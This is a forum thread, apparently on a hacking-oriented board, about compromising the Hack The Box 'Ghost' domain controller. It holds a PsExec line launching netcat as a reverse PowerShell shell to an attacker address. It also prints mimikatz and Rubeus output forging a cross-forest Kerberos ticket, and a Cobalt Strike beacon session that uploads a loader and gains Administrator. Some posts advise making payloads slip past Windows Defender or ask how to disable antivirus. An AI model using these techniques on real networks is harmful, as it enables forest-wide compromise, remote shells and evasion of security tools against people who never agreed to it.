[*]How could I go from accessing `dc01.ghost.htb` via smb to opening up a shell?

I tried PsExec, but didnt workout. and I dont have cobalt strike :/

copy nc.exe \\DC01.ghost.htb\c$\Windows\Temp\
.\PsExec64.exe \\DC01.ghost.htb cmd.exe /c "C:\Windows\Temp\nc.exe -e powershell <ip> <port>"

That doesn't work. It just hangs and eats up so much resource that the host become not responsive

osamy7593 · 07-18-2024, 10:44 PM

guys is there any way to change my username

fuliye · 07-20-2024, 03:53 AM

(07-18-2024, 01:15 PM)mazafaka555 Wrote:
(07-18-2024, 03:28 AM)fuliye Wrote:
(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi User : blahblah Domain : CORP.GHOST.HTB (CORP) SID : S-1-5-21-2034262909-2733679486-000000000 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ; ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt Service : krbtgt Target : GHOST.HTB Lifetime : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM -> Ticket : golden_trust.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # exit Bye! [*] PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*]Action: Ask TGS [*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb' [*]Using domain controller: DC01.ghost.htb (10.10.11.24) [+] TGS request successful! [+] Ticket successfully imported! [*]base64(ticket.kirbi): doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg== ServiceName : cifs/DC01.ghost.htb ServiceRealm : GHOST.HTB UserName : blahblah UserRealm : CORP.GHOST.HTB StartTime : 7/17/2024 5:53:37 AM EndTime : 7/17/2024 3:53:37 PM RenewTill : 7/24/2024 5:53:37 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8= PS C:\tmp> ls \\dc01.ghost.htb\C$ [*] Directory: \\dc01.ghost.htb\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 2/2/2024 8:17 PM Program Files d----- 2/2/2024 8:16 PM Program Files (x86) d-r--- 2/4/2024 1:48 PM Users d----- 7/10/2024 3:08 AM Windows
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

wtf,man , why can you jump , i can't jump,please show the command T_T

[*]first of all, make sure that your raw payload (non-crypted) actually bypasses Win Defender.. then you can utilize usual techniques for lateral movement. like `jump psexec64` or remote-exec and so on..
[*]https://mvc1009.github.io/hackingnotes/red-team/lateral-movement/

[*]if all of these still doesn't work for you, for some reasons... you can still use PsExec from Sysinternals suit, which won't be flagged by any AV product.
[*]make sure you have a correct ticket first & then:
[*]
beacon> dir \\DC01.ghost.htb\C$\Users\Administrator\Desktop [*]beacon> cd \\dc01.ghost.htb\c$\ProgramData beacon> upload /home/kali/htb/machines/ghost/drop/smb-loader.exe [*]beacon> run .\PsExec.exe \\DC01.ghost.htb "c:\programdata\smb-loader.exe" PsExec v2.43 - Execute processes remotely Copyright (C) 2001-2023 Mark Russinovich Sysinternals - www.sysinternals.com Connecting to DC01.ghost.htb...Starting PSEXESVC service on DC01.ghost.htb... Copying authentication key to DC01.ghost.htb...Connecting with PsExec service on DC01.ghost.htb... Starting c:\programdata\smb-loader.exe on DC01.ghost.htb... beacon> link DC01.ghost.htb msagent_0d [*]Tasked to link to \\DC01.ghost.htb\pipe\msagent_0d [+] host called home, sent: 41 bytes [+] established link to child beacon: 10.0.0.254 beacon> getuid [*]You are CORP\Administrator (admin)

wtf,nice , thx man

v33 · 07-23-2024, 08:43 AM

awesome this forum has really helped me..thank you very much bois

0bfusc8 · 07-27-2024, 06:58 PM

can somebody please tell me how to disable av once its in nt service/mssqlserver?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	OLD HTB WRITEUP (GHOST)	vxpenguin69	0	388	01-02-2026, 03:21 AM Last Post: vxpenguin69
	Cobblestone Hack the Box Season 8 (Linux Insane)	RedBlock	0	438	08-09-2025, 12:20 PM Last Post: RedBlock
	HTB - ArtificialUniversity insane active challenge \| flag+writeup	tony_boom23	3	660	04-09-2025, 07:32 PM Last Post: shoryo67
	WhiteRabbit Hack the Box Season 7 (Linux Insane)	RedBlock	66	7,315	04-09-2025, 02:34 PM Last Post: opt_123